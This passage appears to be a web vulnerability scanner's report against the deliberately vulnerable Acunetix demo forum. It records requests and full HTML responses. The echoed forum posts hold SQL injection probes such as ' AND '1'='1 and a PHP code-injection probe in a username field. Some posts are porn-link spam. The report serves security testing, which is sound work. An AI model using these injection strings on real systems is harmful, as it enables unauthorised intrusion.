valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 